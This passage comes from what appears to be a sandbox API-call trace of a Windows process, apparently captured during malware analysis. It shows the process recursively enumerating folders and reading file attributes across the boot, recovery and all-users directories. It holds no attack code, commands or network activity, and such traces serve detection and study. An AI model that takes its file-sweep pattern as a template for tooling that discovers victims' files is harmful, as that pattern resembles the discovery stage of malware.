hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.713] GetFileAttributesExW (in: lpFileName="c:\\boot\\tr-tr\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553a5740, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c1e060, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440)) returned 1 [0038.713] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.713] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0038.713] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.714] FindFirstFileW (in: lpFileName="c:\\boot\\zh-cn\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37c688 [0038.714] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.714] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.714] GetFileAttributesExW (in: lpFileName="c:\\boot\\zh-cn\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553cb8a0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c441c0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440)) returned 1 [0038.714] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.714] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0038.714] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.714] FindFirstFileW (in: lpFileName="c:\\boot\\zh-hk\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37c688 [0038.715] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.715] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.715] GetFileAttributesExW (in: lpFileName="c:\\boot\\zh-hk\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553cb8a0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c441c0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250)) returned 1 [0038.716] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.716] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0038.716] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.716] FindFirstFileW (in: lpFileName="c:\\boot\\zh-tw\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37c688 [0038.716] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.716] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.716] GetFileAttributesExW (in: lpFileName="c:\\boot\\zh-tw\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553cb8a0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8c441c0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240)) returned 1 [0038.717] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.717] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0038.717] FindNextFileW (in: hFindFile=0x379d88, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 0 [0038.717] FindClose (in: hFindFile=0x379d88 | out: hFindFile=0x379d88) returned 1 [0038.717] FindNextFileW (in: hFindFile=0x3788e0, lpFindFileData=0x1cf4c0 | out: lpFindFileData=0x1cf4c0) returned 1 [0038.717] FindNextFileW (in: hFindFile=0x3788e0, lpFindFileData=0x1cf4c0 | out: lpFindFileData=0x1cf4c0) returned 1 [0038.717] GetFileAttributesExW (in: lpFileName="c:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), fInfoLevelId=0x0, lpFileInformation=0x1cf714 | out: lpFileInformation=0x1cf714*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x58b95c40, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0x58b95c40, ftLastAccessTime.dwHighDateTime=0x1d2da3e, ftLastWriteTime.dwLowDateTime=0x58b95c40, ftLastWriteTime.dwHighDateTime=0x1d2da3e, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0038.717] FindNextFileW (in: hFindFile=0x3788e0, lpFindFileData=0x1cf4c0 | out: lpFindFileData=0x1cf4c0) returned 1 [0038.718] FindNextFileW (in: hFindFile=0x3788e0, lpFindFileData=0x1cf4c0 | out: lpFindFileData=0x1cf4c0) returned 1 [0038.718] FindFirstFileW (in: lpFileName="c:\\documents and settings\\\\*", lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 0xffffffff [0038.718] FindNextFileW (in: hFindFile=0x3788e0, lpFindFileData=0x1cf4c0 | out: lpFindFileData=0x1cf4c0) returned 1 [0038.718] FindNextFileW (in: hFindFile=0x3788e0, lpFindFileData=0x1cf4c0 | out: lpFindFileData=0x1cf4c0) returned 1 [0038.718] FindNextFileW (in: hFindFile=0x3788e0, lpFindFileData=0x1cf4c0 | out: lpFindFileData=0x1cf4c0) returned 1 [0038.718] FindNextFileW (in: hFindFile=0x3788e0, lpFindFileData=0x1cf4c0 | out: lpFindFileData=0x1cf4c0) returned 1 [0038.718] FindFirstFileW (in: lpFileName="c:\\perflogs\\\\*", lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 0x37c688 [0038.718] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.718] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.718] FindFirstFileW (in: lpFileName="c:\\perflogs\\admin\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37c6c8 [0038.719] FindNextFileW (in: hFindFile=0x37c6c8, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.719] FindNextFileW (in: hFindFile=0x37c6c8, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.719] FindClose (in: hFindFile=0x37c6c8 | out: hFindFile=0x37c6c8) returned 1 [0038.719] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 0 [0038.719] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0038.719] FindNextFileW (in: hFindFile=0x3788e0, lpFindFileData=0x1cf4c0 | out: lpFindFileData=0x1cf4c0) returned 1 [0038.719] FindNextFileW (in: hFindFile=0x3788e0, lpFindFileData=0x1cf4c0 | out: lpFindFileData=0x1cf4c0) returned 1 [0038.719] FindNextFileW (in: hFindFile=0x3788e0, lpFindFileData=0x1cf4c0 | out: lpFindFileData=0x1cf4c0) returned 1 [0038.719] FindFirstFileW (in: lpFileName="c:\\recovery\\\\*", lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 0x37c688 [0038.719] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.720] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.720] FindFirstFileW (in: lpFileName="c:\\recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37be48 [0038.720] FindNextFileW (in: hFindFile=0x37be48, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.720] FindNextFileW (in: hFindFile=0x37be48, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.720] FindNextFileW (in: hFindFile=0x37be48, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.720] FindNextFileW (in: hFindFile=0x37be48, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0 [0038.720] FindClose (in: hFindFile=0x37be48 | out: hFindFile=0x37be48) returned 1 [0038.721] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 0 [0038.721] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0038.721] FindNextFileW (in: hFindFile=0x3788e0, lpFindFileData=0x1cf4c0 | out: lpFindFileData=0x1cf4c0) returned 1 [0038.721] FindNextFileW (in: hFindFile=0x3788e0, lpFindFileData=0x1cf4c0 | out: lpFindFileData=0x1cf4c0) returned 1 [0038.721] FindFirstFileW (in: lpFileName="c:\\users\\\\*", lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 0x37cf98 [0038.721] FindNextFileW (in: hFindFile=0x37cf98, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.721] FindNextFileW (in: hFindFile=0x37cf98, lpFindFileData=0x1cef60 | out: lpFindFileData=0x1cef60) returned 1 [0038.721] FindFirstFileW (in: lpFileName="c:\\users\\all users\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37be48 [0038.721] FindNextFileW (in: hFindFile=0x37be48, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.721] FindNextFileW (in: hFindFile=0x37be48, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.721] FindFirstFileW (in: lpFileName="c:\\users\\all users\\adobe\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37ad90 [0038.722] FindNextFileW (in: hFindFile=0x37ad90, lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 1 [0038.722] FindNextFileW (in: hFindFile=0x37ad90, lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 1 [0038.722] FindFirstFileW (in: lpFileName="c:\\users\\all users\\adobe\\acrobat\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37c6e0 [0038.722] FindNextFileW (in: hFindFile=0x37c6e0, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 1 [0038.722] FindNextFileW (in: hFindFile=0x37c6e0, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 1 [0038.723] FindFirstFileW (in: lpFileName="c:\\users\\all users\\adobe\\acrobat\\10.0\\\\*", lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0x37eff0 [0038.723] FindNextFileW (in: hFindFile=0x37eff0, lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 1 [0038.723] FindNextFileW (in: hFindFile=0x37eff0, lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 1 [0038.723] FindFirstFileW (in: lpFileName="c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x380038 [0038.723] FindNextFileW (in: hFindFile=0x380038, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 1 [0038.723] FindNextFileW (in: hFindFile=0x380038, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 1 [0038.723] FindFirstFileW (in: lpFileName="c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\\\*", lpFindFileData=0x1ccf20 | out: lpFindFileData=0x1ccf20) returned 0x3811c8 [0038.724] FindNextFileW (in: hFindFile=0x3811c8, lpFindFileData=0x1ccf20 | out: lpFindFileData=0x1ccf20) returned 1 [0038.724] FindNextFileW (in: hFindFile=0x3811c8, lpFindFileData=0x1ccf20 | out: lpFindFileData=0x1ccf20) returned 1 [0038.724] FindNextFileW (in: hFindFile=0x3811c8, lpFindFileData=0x1ccf20 | out: lpFindFileData=0x1ccf20) returned 0 [0038.724] FindClose (in: hFindFile=0x3811c8 | out: hFindFile=0x3811c8) returned 1 [0038.724] FindNextFileW (in: hFindFile=0x380038, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0 [0038.724] FindClose (in: hFindFile=0x380038 | out: hFindFile=0x380038) returned 1 [0038.724] FindNextFileW (in: hFindFile=0x37eff0, lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0 [0038.724] FindClose (in: hFindFile=0x37eff0 | out: hFindFile=0x37eff0) returned 1 [0038.724] FindNextFileW (in: hFindFile=0x37c6e0, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0 [0038.724] FindClose (in: hFindFile=0x37c6e0 | out: hFindFile=0x37c6e0) returned 1 [0038.724] FindNextFileW (in: hFindFile=0x37ad90, lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0 [0038.725] FindClose (in: hFindFile=0x37ad90 | out: hFindFile=0x37ad90) returned 1 [0038.725] FindNextFileW (in: hFindFile=0x37be48, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.725] FindFirstFileW (in: lpFileName="c:\\users\\all users\\application data\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0038.725] FindNextFileW (in: hFindFile=0x37be48, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.725] FindFirstFileW (in: lpFileName="c:\\users\\all users\\desktop\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0038.725] FindNextFileW (in: hFindFile=0x37be48, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.725] FindFirstFileW (in: lpFileName="c:\\users\\all users\\documents\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0038.725] FindNextFileW (in: hFindFile=0x37be48, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.725] FindFirstFileW (in: lpFileName="c:\\users\\all users\\favorites\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0038.725] FindNextFileW (in: hFindFile=0x37be48, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.725] FindNextFileW (in: hFindFile=0x37be48, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.725] FindNextFileW (in: hFindFile=0x37be48, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.725] FindFirstFileW (in: lpFileName="c:\\users\\all users\\mozilla\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37ad90 [0038.726] FindNextFileW (in: hFindFile=0x37ad90, lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 1 [0038.726] FindNextFileW (in: hFindFile=0x37ad90, lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 1 [0038.726] FindFirstFileW (in: lpFileName="c:\\users\\all users\\mozilla\\logs\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37c6f0 [0038.726] FindNextFileW (in: hFindFile=0x37c6f0, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 1 [0038.726] FindNextFileW (in: hFindFile=0x37c6f0, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 1 [0038.726] GetFileAttributesExW (in: lpFileName="c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74b72710, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x74b72710, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x76dd04b0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xa4)) returned 1 [0038.726] FindNextFileW (in: hFindFile=0x37c6f0, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0 [0038.726] FindClose (in: hFindFile=0x37c6f0 | out: hFindFile=0x37c6f0) returned 1 [0038.726] FindNextFileW (in: hFindFile=0x37ad90, lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0 [0038.726] FindClose (in: hFindFile=0x37ad90 | out: hFindFile=0x37ad90) returned 1 [0038.727] FindNextFileW (in: hFindFile=0x37be48, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.727] FindFirstFileW (in: lpFileName="c:\\users\\all users\\oracle\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37ad90 [0038.727] FindNextFileW (in: hFindFile=0x37ad90, lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 1 [0038.727] FindNextFileW (in: hFindFile=0x37ad90, lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0 [0038.727] FindClose (in: hFindFile=0x37ad90 | out: hFindFile=0x37ad90) returned 1 [0038.727] FindNextFileW (in: hFindFile=0x37be48, lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 1 [0038.727] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0038.728] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 1 [0038.728] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 1 [0038.728] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37c730 [0038.729] FindNextFileW (in: hFindFile=0x37c730, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 1 [0038.729] FindNextFileW (in: hFindFile=0x37c730, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 1 [0038.729] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\packages\\\\*", lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0x37e140 [0038.730] FindNextFileW (in: hFindFile=0x37e140, lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 1 [0038.730] FindNextFileW (in: hFindFile=0x37e140, lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 1 [0038.730] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\packages\\patch\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37e248 [0038.731] FindNextFileW (in: hFindFile=0x37e248, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 1 [0038.731] FindNextFileW (in: hFindFile=0x37e248, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 1 [0038.731] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\packages\\patch\\x86\\\\*", lpFindFileData=0x1ccf20 | out: lpFindFileData=0x1ccf20) returned 0x37e350 [0038.731] FindNextFileW (in: hFindFile=0x37e350, lpFindFileData=0x1ccf20 | out: lpFindFileData=0x1ccf20) returned 1 [0038.731] FindNextFileW (in: hFindFile=0x37e350, lpFindFileData=0x1ccf20 | out: lpFindFileData=0x1ccf20) returned 1 [0038.731] FindNextFileW (in: hFindFile=0x37e350, lpFindFileData=0x1ccf20 | out: lpFindFileData=0x1ccf20) returned 0 [0038.731] FindClose (in: hFindFile=0x37e350 | out: hFindFile=0x37e350) returned 1 [0038.731] FindNextFileW (in: hFindFile=0x37e248, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0 [0038.731] FindClose (in: hFindFile=0x37e248 | out: hFindFile=0x37e248) returned 1 [0038.731] FindNextFileW (in: hFindFile=0x37e140, lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0 [0038.731] FindClose (in: hFindFile=0x37e140 | out: hFindFile=0x37e140) returned 1 [0038.731] FindNextFileW (in: hFindFile=0x37c730, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0 [0038.731] FindClose (in: hFindFile=0x37c730 | out: hFindFile=0x37c730) returned 1 [0038.732] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 1 [0038.732] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37c730 [0038.771] FindNextFileW (in: hFindFile=0x37c730, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 1 [0038.771] FindNextFileW (in: hFindFile=0x37c730, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 1 [0038.771] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\packages\\\\*", lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0x37e140 [0038.773] FindNextFileW (in: hFindFile=0x37e140, lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 1 [0038.773] FindNextFileW (in: hFindFile=0x37e140, lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 1 [0038.773] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\packages\\patch\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37e248 [0038.773] FindNextFileW (in: hFindFile=0x37e248, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 1 [0038.773] FindNextFileW (in: hFindFile=0x37e248, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 1 [0038.773] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\packages\\patch\\x86\\\\*", lpFindFileData=0x1ccf20 | out: lpFindFileData=0x1ccf20) returned 0x37e350 [0038.774] FindNextFileW (in: hFindFile=0x37e350, lpFindFileData=0x1ccf20 | out: lpFindFileData=0x1ccf20) returned 1 [0038.774] FindNextFileW (in: hFindFile=0x37e350, lpFindFileData=0x1ccf20 | out: lpFindFileData=0x1ccf20) returned 1 [0038.774] FindNextFileW (in: hFindFile=0x37e350, lpFindFileData=0x1ccf20 | out: lpFindFileData=0x1ccf20) returned 0 [0038.774] FindClose (in: hFindFile=0x37e350 | out: hFindFile=0x37e350) returned 1 [0038.774] FindNextFileW (in: hFindFile=0x37e248, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0 [0038.774] FindClose (in: hFindFile=0x37e248 | out: hFindFile=0x37e248) returned 1 [0038.774] FindNextFileW (in: hFindFile=0x37e140, lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0 [0038.774] FindClose (in: hFindFile=0x37e140 | out: hFindFile=0x37e140) returned 1 [0038.774] FindNextFileW (in: hFindFile=0x37c730, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0 [0038.774] FindClose (in: hFindFile=0x37c730 | out: hFindFile=0x37c730) returned 1 [0038.774] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 1 [0038.774] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37c740 [0038.812] FindNextFileW (in: hFindFile=0x37c740, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 1 [0038.812] FindNextFileW (in: hFindFile=0x37c740, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 1 [0038.812] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\\\*", lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0x37e160 [0038.813] FindNextFileW (in: hFindFile=0x37e160, lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 1 [0038.813] FindNextFileW (in: hFindFile=0x37e160, lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 1 [0038.813] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37e298 [0038.815] FindNextFileW (in: hFindFile=0x37e298, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 1 [0038.815] FindNextFileW (in: hFindFile=0x37e298, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 1 [0038.815] GetFileAttributesExW (in: lpFileName="c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), fInfoLevelId=0x0, lpFileInformation=0x1cd6d4 | out: lpFileInformation=0x1cd6d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6014500, ftCreationTime.dwHighDateTime=0x1cf3e37, ftLastAccessTime.dwLowDateTime=0xe6014500, ftLastAccessTime.dwHighDateTime=0x1cf3e37, ftLastWriteTime.dwLowDateTime=0xe6014500, ftLastWriteTime.dwHighDateTime=0x1cf3e37, nFileSizeHigh=0x0, nFileSizeLow=0xf36be)) returned 1 [0038.842] FindNextFileW (in: hFindFile=0x37e298, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 1 [0038.842] FindNextFileW (in: hFindFile=0x37e298, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0 [0038.842] FindClose (in: hFindFile=0x37e298 | out: hFindFile=0x37e298) returned 1 [0038.842] FindNextFileW (in: hFindFile=0x37e160, lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0 [0038.842] FindClose (in: hFindFile=0x37e160 | out: hFindFile=0x37e160) returned 1 [0038.842] FindNextFileW (in: hFindFile=0x37c740, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0 [0038.843] FindClose (in: hFindFile=0x37c740 | out: hFindFile=0x37c740) returned 1 [0038.843] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 1 [0038.843] FindFirstFileW (in: 